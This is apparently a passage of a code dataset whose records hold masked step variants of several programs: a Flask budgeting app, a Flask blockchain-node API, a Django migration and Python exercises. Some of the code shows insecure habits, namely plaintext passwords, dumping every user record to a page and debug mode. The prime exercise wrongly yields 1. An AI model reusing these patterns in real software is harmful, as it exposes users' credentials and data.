redirect(url_for('login'))\r\n\r\n user_id = db.search_user_list(session['username'])[0][2]\r\n goal=db.search_goal_list(user_id)\r\n if goal == []:\r\n return redirect(url_for('goals'))\r\n daily=db.search_expense_list(user_id)\r\n monthly=db.search_monthly_list(user_id)\r\n dadict={}\r\n modict={}\r\n print(goal)\r\n ratings={}\r\n for names in daily:\r\n dadict[names[0]]=names[1]\r\n for names in monthly:\r\n modict[names[0]]=names[1]\r\n print(dadict,modict)\r\n percent=0\r\n for names in db.search_rating_list(user_id):\r\n print(names)\r\n if names[0] in modict:\r\n percent=(modict[names[0]]*12)/goal[0][1]\r\n if names[0] in dadict:\r\n percent=(dadict[names[0]]*30*12)/goal[0][1]\r\n if names[1]<=6 and percent >=0.05:\r\n ratings[names[0]]=(names[1],percent)\r\n print(ratings)\r\n return render_template('area.html',idnum=user_id,ratings=ratings)\r\[email protected]('/logout')\r\ndef logout():\r\n if 'username' in session:\r\n session.pop('username')\r\n return redirect(url_for('home'))\r\n\r\[email protected]('/account')\r\ndef account():\r\n if 'username' not in session:\r\n flash(\"You must be logged in to access this page\")\r\n return redirect(url_for('login'))\r\n # print(db.search_user_list(session['username']))\r\n user_list = json.dumps(db.search_user_list(ret_all=True))\r\n print(json.dumps(db.search_user_list(ret_all=True)))\r\n return render_template('accounts.html', user_list=user_list)\r\n\r\[email protected]('/update', methods=[\"POST\"])\r\ndef update():\r\n print('this is the updates')\r\n update_dict = request.form['all-options']\r\n update_dict = json.loads(update_dict)\r\n print(request.form)\r\n user_ids = db.search_user_list(session['username'])\r\n user = user_ids[0][-1]\r\n print(user)\r\n db.update_user_list(update_dict['username'] or user_ids[0][0], update_dict['password'] or user_ids[0][1], user)\r\n db.reset_statistics(user, update_dict['reset'])\r\n session.pop('username')\r\n session['username'] = update_dict['username'] or 
user_ids[0][0] # change username in session\r\n flash(\"Account information updated successfully\")\r\n return redirect(url_for('home'))\r\n\r\[email protected]('/del')\r\ndef delete():\r\n if 'username' not in session:\r\n flash(\"Woops. You can't be here\")\r\n return redirect(url_for('login'))\r\n user = db.search_user_list(session['username'])[0][-1]\r\n print(user)\r\n db.update_user_list(None, None, user, rem=True)\r\n flash(\"User successfully removed\")\r\n session.pop('username')\r\n return redirect(url_for('home'))\r\n\r\nif __name__ == \"__main__\":\r\n app.debug = True\r\n app.run()\r\n",
"step-ids": [
14,
15,
16,
18,
19
]
}
|
[
14,
15,
16,
18,
19
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, request, jsonify
from app import Node
from dbm2 import filemanager
# Persistent storage backend used by the node.
fm = filemanager()
# Blockchain node instance backing every HTTP endpoint below.
node = Node(fm)
# Flask application exposing the node's REST API.
app = Flask(__name__)
@app.route("/transactions/isfull", methods=['GET'])
def isFull():
    """Report whether the node's pending-transaction pool is full."""
    full = node.isFull()
    return jsonify(full), 200
@app.route("/transactions/new", methods=["POST"])
def newTransaction():
    """Validate a submitted transaction against the node's valid chain.

    Echoes the transaction back on success, JSON ``false`` otherwise.
    """
    txn = request.get_json()
    if not node.isValidTxn(node.isValidChain(), txn):
        return jsonify(False), 200
    return txn, 200
@app.route("/chain/last", methods=["GET"])
def last_block():
    """Return the most recent block of the node's chain."""
    newest = node.getLastBlock()
    return jsonify(newest), 200
@app.route("/chain", methods=["GET"])
def get_chain():
    """Return the node's full blockchain as JSON."""
    chain = node.chain
    return jsonify(chain), 200
@app.route("/pnodes/register", methods=["POST"])
def register_pnodes():
    """Register up to 10 peer-node addresses with this node.

    Expects a JSON list of addresses in the request body.  Returns a
    summary of which addresses were added and which were not (200), or an
    error payload (400) when the body is not a list.
    """
    nodes = request.get_json()
    print(nodes)  # debug: incoming payload
    if not isinstance(nodes, list):  # was `type(nodes)==list` — isinstance is the idiom
        return jsonify({"Error": "Input format error"}), 400
    # Cap the batch at 10 addresses per request (the old `nodes != []`
    # check was redundant: len(nodes) > 10 already implies non-empty).
    if len(nodes) > 10:
        nodes = nodes[:10]
    added = []   # addresses the node accepted
    failed = []  # addresses the node refused
    for addr in nodes:
        if node.addPNode(addr):
            added.append(addr)
        else:
            failed.append(addr)
    resp = {"Added PNodes": added,
            "Not added pnodes": failed}
    return jsonify(resp), 200
@app.route("/pnodes/size", methods=["GET"])
def pnodes_size():
    """Return how many peer nodes are currently registered."""
    count = len(node.pnodes)
    return jsonify(count), 200
@app.route("/nodes", methods=["GET"])
def get_nodes():
    """Return the node's known peers as a JSON list."""
    return jsonify(list(node.nodes)), 200
@app.route("/nodes/resolve", methods=["GET"])
def resolve_nodes():
    """Ask the node to discover peers; 400 when nothing new was found."""
    discovered = node.resolveNodes()
    if not discovered:
        return "0 nodes added", 400
    return jsonify(discovered), 200
@app.route("/chain/resolve", methods=["GET"])
def resolve_chain():
    """Run the consensus algorithm; 400 when the local chain already wins."""
    result = node.resolveConflicts()
    if result:
        return jsonify(result), 200
    print("Nothing")  # debug: no conflict was resolved
    return jsonify(result), 400
@app.route("/mine", methods=["GET"])
def mine():
    """Mine a new block and return it wrapped in a response object."""
    mined = node.mine()
    return jsonify({"Mined_block": mined}), 200
if __name__ == "__main__":
    import argparse

    # Entry point: pick a listening port, record it on the node, then
    # serve the API on every interface (empty host string).
    parser = argparse.ArgumentParser()
    parser.add_argument("-p", "--port", type=int,
                        default=node.DEFAULT_PORT,
                        help='port to listen on')
    port = parser.parse_args().port
    node.port = port
    app.run(host="", port=port)
|
normal
|
{
"blob_id": "45b46a08d8b304ac12baf34e0916b249b560418f",
"index": 7459,
"step-1": "<mask token>\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\n<mask token>\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\n<mask token>\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, 
type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-3": "<mask token>\nfm = filemanager()\nnode = Node(fm)\napp = Flask(__name__)\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n 
parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-4": "from flask import Flask, request, jsonify\nfrom app import Node\nfrom dbm2 import filemanager\nfm = filemanager()\nnode = Node(fm)\napp = Flask(__name__)\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\[email protected]('/chain/last', methods=['GET'])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\[email protected]('/nodes/resolve', methods=['GET'])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return '0 nodes added', 400\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print('Nothing')\n return jsonify(r), 400\n\n\[email protected]('/mine', methods=['GET'])\ndef mine():\n mb = node.mine()\n resp = {'Mined_block': mb}\n return jsonify(resp), 200\n\n\nif __name__ == 
'__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--port', default=node.DEFAULT_PORT, type=int,\n help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port = port\n app.run(host='', port=port)\n",
"step-5": "#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, request, jsonify\nfrom app import Node\nfrom dbm2 import filemanager\n\nfm = filemanager()\nnode = Node(fm)\n\napp = Flask(__name__)\n\[email protected](\"/transactions/isfull\",methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\[email protected](\"/transactions/new\",methods=[\"POST\"])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(),transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\[email protected](\"/chain/last\",methods=[\"GET\"])\ndef last_block():\n return jsonify(node.getLastBlock()), 200\[email protected](\"/chain\",methods=[\"GET\"])\ndef get_chain():\n return jsonify(node.chain), 200\[email protected](\"/pnodes/register\",methods=[\"POST\"])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes)==list:\n if len(nodes)>10 and nodes!=[]:\n nodes = nodes[:10]\n s = [] #succeed\n f = [] #failed\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {\"Added PNodes\":s,\n \"Not added pnodes\":f}\n return jsonify(resp), 200\n resp = {\"Error\":\"Input format error\"}\n return jsonify(resp), 400\[email protected](\"/pnodes/size\",methods=[\"GET\"])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\[email protected](\"/nodes\",methods=[\"GET\"])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\[email protected](\"/nodes/resolve\",methods=[\"GET\"])\ndef resolve_nodes():\n added_nodes = node.resolveNodes()\n if added_nodes:\n return jsonify(added_nodes), 200\n else:\n return \"0 nodes added\",400\n\[email protected](\"/chain/resolve\",methods=[\"GET\"])\ndef resolve_chain():\n r = node.resolveConflicts()\n if r:\n return jsonify(r), 200\n else:\n print(\"Nothing\")\n return jsonify(r), 400\[email protected](\"/mine\",methods=[\"GET\"])\ndef mine():\n mb = node.mine()\n 
resp = {\"Mined_block\":mb}\n return jsonify(resp), 200\nif __name__==\"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\",\"--port\",default=node.DEFAULT_PORT,type=int,help='port to listen on')\n args = parser.parse_args()\n port = args.port\n node.port=port\n app.run(host=\"\",port=port)\n \n",
"step-ids": [
8,
11,
12,
13,
14
]
}
|
[
8,
11,
12,
13,
14
] |
# Generated by Django 2.2.1 on 2019-06-01 09:56
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the ``Participant`` table.

    ``username`` is the primary key.  The four ``*_datetime`` fields all
    default to the Unix timestamp captured when this migration was
    generated (1559382976.184129), not to the time of row insertion.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Participant',
            fields=[
                ('username', models.CharField(max_length=25, primary_key=True, serialize=False)),
                ('phone_num', models.CharField(default='', max_length=16)),
                ('password', models.CharField(max_length=16)),
                # NOTE(review): float defaults on BigIntegerField columns —
                # confirm the fractional part is meant to be dropped.
                ('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
                ('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
                ('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),
                ('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),
            ],
        ),
    ]
|
normal
|
{
"blob_id": "58b12418a2a6b1ef9b63800b89e7f0b9fffd908c",
"index": 9223,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Participant', fields=[(\n 'username', models.CharField(max_length=25, primary_key=True,\n serialize=False)), ('phone_num', models.CharField(default='',\n max_length=16)), ('password', models.CharField(max_length=16)), (\n 'register_datetime', models.BigIntegerField(blank=True, default=\n 1559382976.184129)), ('last_login_datetime', models.BigIntegerField\n (blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',\n models.BigIntegerField(blank=True, default=1559382976.184129)), (\n 'heartbeat_smartphone', models.BigIntegerField(blank=True, default=\n 1559382976.184129))])]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Participant', fields=[(\n 'username', models.CharField(max_length=25, primary_key=True,\n serialize=False)), ('phone_num', models.CharField(default='',\n max_length=16)), ('password', models.CharField(max_length=16)), (\n 'register_datetime', models.BigIntegerField(blank=True, default=\n 1559382976.184129)), ('last_login_datetime', models.BigIntegerField\n (blank=True, default=1559382976.184129)), ('heartbeat_smartwatch',\n models.BigIntegerField(blank=True, default=1559382976.184129)), (\n 'heartbeat_smartphone', models.BigIntegerField(blank=True, default=\n 1559382976.184129))])]\n",
"step-5": "# Generated by Django 2.2.1 on 2019-06-01 09:56\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Participant',\n fields=[\n ('username', models.CharField(max_length=25, primary_key=True, serialize=False)),\n ('phone_num', models.CharField(default='', max_length=16)),\n ('password', models.CharField(max_length=16)),\n ('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<|reserved_special_token_0|>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
<|reserved_special_token_0|>
print(z)
<|reserved_special_token_0|>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
<|reserved_special_token_0|>
print(z)
<|reserved_special_token_0|>
print(combinaciones)
print('El número de combinaciones es:', len(combinaciones))
<|reserved_special_token_0|>
print(combinacionesFedora)
print('Número de combinaciones que incluyen sombrero fedora:', len(
combinacionesFedora))
<|reserved_special_token_0|>
print(Y)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def gprimo(nmax):
for x in range(1, nmax):
for i in range(2, x):
if x % i != 0:
continue
else:
break
else:
yield x
a = gprimo(10)
z = [e for e in a]
print(z)
<|reserved_special_token_0|>
def genBadaBoom(N):
if N > 0:
for i in range(1, N + 1):
if i % 3 == 0 and i % 5 == 0:
yield 'Bada Boom!!'
elif i % 3 == 0:
yield 'Bada'
elif i % 5 == 0:
yield 'Boom!!'
else:
yield i
a = genBadaBoom(10)
z = [e for e in a]
print(z)
<|reserved_special_token_0|>
camisas = ['roja', 'negra', 'azul', 'morada', 'cafe']
pantalones = ['negro', 'azul', 'cafe obscuro', 'crema']
accesorios = ['cinturon', 'tirantes', 'lentes', 'fedora']
combinaciones = [(x, y, z) for y in camisas for x in pantalones for z in
accesorios]
print(combinaciones)
print('El número de combinaciones es:', len(combinaciones))
<|reserved_special_token_0|>
combinacionesFedora = [(x, y, z) for x, y, z in combinaciones if z == 'fedora']
print(combinacionesFedora)
print('Número de combinaciones que incluyen sombrero fedora:', len(
combinacionesFedora))
<|reserved_special_token_0|>
cancion = """There's a hole in my heart, in my life, in my way
And it's filled with regret and all I did, to push you away
If there's still a place in your life, in your heart for me
I would do anything, so don't ask me to leave
I've got a hole in my soul where you use to be
You're the thorn in my heart and you're killing me
I wish I could go back and do it all differently
I wish that I'd treated you differently
'Cause now there's a hole in my soul where you use to be"""
cancion = list(cancion)
frecuenciaPalab = [cancion.count(w.casefold()) for w in cancion]
letra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab), cancion)
Y = list(letra)
Y = dict.fromkeys(Y).keys()
print(Y)
<|reserved_special_token_1|>
"""
Primos <generadores> 30 pts
Realice una generador que devuelva de todos lo numeros primos
existentes de 0 hasta n-1 que cumpla con el siguiente prototipo:
def gprimo(N):
pass
a = gprimo(10)
z = [e for e in a]
print(z)
# [2, 3 ,5 ,7 ]
"""
def gprimo(nmax):
    """Generate every prime number below *nmax*.

    Fix: the original loop started at 1 and therefore yielded 1, which is
    not prime — the expected output documented above is ``[2, 3, 5, 7]``
    for ``gprimo(10)``.  Primes start at 2, so the scan begins there.
    """
    for x in range(2, nmax):
        # Trial division: x is prime iff no i in 2..x-1 divides it.
        for i in range(2, x):
            if x % i == 0:
                break
        else:
            # Inner loop finished without finding a divisor: x is prime.
            yield x
# Demo: collect the primes below 10 and print them.
a = gprimo(10)
z =[e for e in a]
print(z)
"""
Bada Boom!!! <generadores> 20 pts
Defina un generador que reciba un numero entero positivo mayor a 0 N,
dicho generador proporciona numero de 1 hasta N
con las siguientes condiciones:
1) si es multiplo de 3 coloque la cadena "Bada"
2) si es multiplo de 5 coloque la cadena "Boom!!"
3) si es multiplo de 3 y 5 coloque "Bada Boom!!"
def genBadaBoom(N):
pass
a = genBadaBoom(10)
z = [e for e in a]
print(z)
#[1,2,"Bada",4,"Boom","Bada",7,8,"Bada","Boom"]
"""
def genBadaBoom(N):
    """Yield 1..N, replacing multiples of 3 with "Bada", multiples of 5
    with "Boom!!", and multiples of both with "Bada Boom!!".

    Yields nothing when N is not a positive integer.
    """
    if N > 0:
        for value in range(1, N + 1):
            words = []
            if value % 3 == 0:
                words.append("Bada")
            if value % 5 == 0:
                words.append("Boom!!")
            # Joining covers all three replacement cases in one expression.
            yield " ".join(words) if words else value
# Demo: FizzBuzz-style sequence for 1..10.
a = genBadaBoom(10)
z = [e for e in a]
print(z)
"""
Combinaciones <Comprensión de listas> 30pts
Una tienda de ropa quiere saber cuantos conjuntos se pueden crear
a partir de un grupo de 5 camisas (roja,negra,azul,morada y cafe),
4 pantalones (negro, azul, cafe obscuro y crema) y uno de 4 accesorios
posibles (cinturon, tirantes, lentes, fedora)
1) Obtenga una lista con todos los conjuntos posibles e imprimala en pantalla
2) imprima un mensaje donde mencione la cantidad de conjuntos posibles
"""
# Wardrobe options: every outfit is one shirt + one pair of trousers +
# one accessory, stored as a (trousers, shirt, accessory) tuple.
camisas = ["roja", "negra", "azul", "morada", "cafe"]
pantalones = ["negro", "azul", "cafe obscuro", "crema"]
accesorios = ["cinturon", "tirantes", "lentes", "fedora"]
combinaciones = [
    (pantalon, camisa, accesorio)
    for camisa in camisas
    for pantalon in pantalones
    for accesorio in accesorios
]
print(combinaciones)
print("El número de combinaciones es:", len(combinaciones))
"""
¿Fedora? <Comprensión de listas > 15 pts
Del problema anterior imprima una lista que tenga todos los conjuntos
que incluyen un sombrero fedora y tambien despliegue su longitud
"""
# Keep only the outfits whose accessory (third element) is the fedora hat.
combinacionesFedora = [outfit for outfit in combinaciones if outfit[2] == 'fedora']
print(combinacionesFedora)
print("Número de combinaciones que incluyen sombrero fedora:", len(combinacionesFedora))
"""
<Monads> 30 pts
--Lacrimosa - Durch Nacht und Flut --
Die Suche endet jetzt und hier
Gestein kalt und nass
Granit in Deiner Brust
Der Stein der Dich zerdrückt
Der Fels der Dich umgibt
Aus dem gehauen Du doch bist
Despiertate te busco
Mi corazon abreté te libro
Elevate mi luz y prende mi llama
Si a ti, yo se, te encontrare
El fragmento anterior es un canción del duo lacrimosa
Usando Monads obtenga la letra
que menos se repite por cada linea y obtenga la probabilidad de sacar dicha
letra.
Nota: Pueden ayudarse de funciones recursivas y compresiones de lista.
"""
"""
<Monads>
--Hole in my soul apocalyptica-- 20 pts
El fragmento anterior es un canción del grupo apocalyptica
Usando Monads obtenga la letra
que menos se repite de todo el fragmento y obtenga la probabilidad de sacar dicha
letra.
Nota: Pueden ayudarse de funciones recursivas y compresiones de lista.
"""
cancion = """There's a hole in my heart, in my life, in my way
And it's filled with regret and all I did, to push you away
If there's still a place in your life, in your heart for me
I would do anything, so don't ask me to leave
I've got a hole in my soul where you use to be
You're the thorn in my heart and you're killing me
I wish I could go back and do it all differently
I wish that I'd treated you differently
'Cause now there's a hole in my soul where you use to be"""
cancion = list(cancion)  # split the lyrics into a list of single characters
frecuenciaPalab = [cancion.count(w.casefold()) for w in cancion]  # per-character frequency; NOTE(review): counts the lower-cased char against the mixed-case list, so 'T' is scored by how often 't' occurs — confirm intended
letra = filter(lambda a: cancion.count(a) == min(frecuenciaPalab),cancion)  # keep characters whose (case-sensitive) count equals the minimum frequency found above
Y = list(letra)  # materialise the filter object
Y = dict.fromkeys(Y).keys()  # dict keys are unique, so this removes duplicates while preserving first-seen order
print(Y)
|
flexible
|
{
"blob_id": "732886306d949c4059b08e1bc46de3ad95ba56cb",
"index": 1685,
"step-1": "<mask token>\n\n\ndef gprimo(nmax):\n for x in range(1, nmax):\n for i in range(2, x):\n if x % i != 0:\n continue\n else:\n break\n else:\n yield x\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gprimo(nmax):\n for x in range(1, nmax):\n for i in range(2, x):\n if x % i != 0:\n continue\n else:\n break\n else:\n yield x\n\n\n<mask token>\n\n\ndef genBadaBoom(N):\n if N > 0:\n for i in range(1, N + 1):\n if i % 3 == 0 and i % 5 == 0:\n yield 'Bada Boom!!'\n elif i % 3 == 0:\n yield 'Bada'\n elif i % 5 == 0:\n yield 'Boom!!'\n else:\n yield i\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gprimo(nmax):\n for x in range(1, nmax):\n for i in range(2, x):\n if x % i != 0:\n continue\n else:\n break\n else:\n yield x\n\n\n<mask token>\nprint(z)\n<mask token>\n\n\ndef genBadaBoom(N):\n if N > 0:\n for i in range(1, N + 1):\n if i % 3 == 0 and i % 5 == 0:\n yield 'Bada Boom!!'\n elif i % 3 == 0:\n yield 'Bada'\n elif i % 5 == 0:\n yield 'Boom!!'\n else:\n yield i\n\n\n<mask token>\nprint(z)\n<mask token>\nprint(combinaciones)\nprint('El número de combinaciones es:', len(combinaciones))\n<mask token>\nprint(combinacionesFedora)\nprint('Número de combinaciones que incluyen sombrero fedora:', len(\n combinacionesFedora))\n<mask token>\nprint(Y)\n",
"step-4": "<mask token>\n\n\ndef gprimo(nmax):\n for x in range(1, nmax):\n for i in range(2, x):\n if x % i != 0:\n continue\n else:\n break\n else:\n yield x\n\n\na = gprimo(10)\nz = [e for e in a]\nprint(z)\n<mask token>\n\n\ndef genBadaBoom(N):\n if N > 0:\n for i in range(1, N + 1):\n if i % 3 == 0 and i % 5 == 0:\n yield 'Bada Boom!!'\n elif i % 3 == 0:\n yield 'Bada'\n elif i % 5 == 0:\n yield 'Boom!!'\n else:\n yield i\n\n\na = genBadaBoom(10)\nz = [e for e in a]\nprint(z)\n<mask token>\ncamisas = ['roja', 'negra', 'azul', 'morada', 'cafe']\npantalones = ['negro', 'azul', 'cafe obscuro', 'crema']\naccesorios = ['cinturon', 'tirantes', 'lentes', 'fedora']\ncombinaciones = [(x, y, z) for y in camisas for x in pantalones for z in\n accesorios]\nprint(combinaciones)\nprint('El número de combinaciones es:', len(combinaciones))\n<mask token>\ncombinacionesFedora = [(x, y, z) for x, y, z in combinaciones if z == 'fedora']\nprint(combinacionesFedora)\nprint('Número de combinaciones que incluyen sombrero fedora:', len(\n combinacionesFedora))\n<mask token>\ncancion = \"\"\"There's a hole in my heart, in my life, in my way\nAnd it's filled with regret and all I did, to push you away\nIf there's still a place in your life, in your heart for me\nI would do anything, so don't ask me to leave\n\nI've got a hole in my soul where you use to be\nYou're the thorn in my heart and you're killing me\nI wish I could go back and do it all differently\nI wish that I'd treated you differently\n'Cause now there's a hole in my soul where you use to be\"\"\"\ncancion = list(cancion)\nfrecuenciaPalab = [cancion.count(w.casefold()) 